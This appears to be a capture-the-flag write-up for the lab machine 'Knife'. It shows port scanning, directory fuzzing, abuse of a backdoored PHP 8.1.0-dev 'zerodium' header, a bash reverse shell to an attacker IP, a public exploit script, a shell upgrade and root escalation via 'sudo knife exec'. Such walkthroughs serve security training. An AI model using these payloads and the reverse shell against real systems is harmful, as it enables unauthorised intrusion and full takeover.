Knife

# TCP
nmap -vvv 10.10.10.242 -p- -sCV -oA knifeTCP
# UDP 
nmap -vvv 10.10.10.242 -sU --top-ports 100 -oA knifeUDP

We start enumeration we only get TCP 22 (ssh) , 80 (http)

now we fuzz directories and pages

dirsearch -u http://10.10.10.242/

we only get 403

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.10.242:80/FUZZ.php -ic

we only get index.php , so i tried to use another wordlist called all_files.txt

For a reason i don't know every thing after index.php returns the content of index.php

we can execute commands on the system using this backdoor and utilizing this payload

zerodium system("command");

Now we can get a reverse shell with this exploit

zerodium system("bash -c '/bin/bash -i >& /dev/tcp/10.10.16.9/8000 0>&1'");

We could also used an available epxloit.

git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
cd php-8.1.0-dev-backdoor-rce

python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>
python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.16.9 8000

Upgrade Your Shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo;fg

we get the user flag, and we can use knife with sudo permissions.

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'

Last updated 4 months ago

Was this helpful?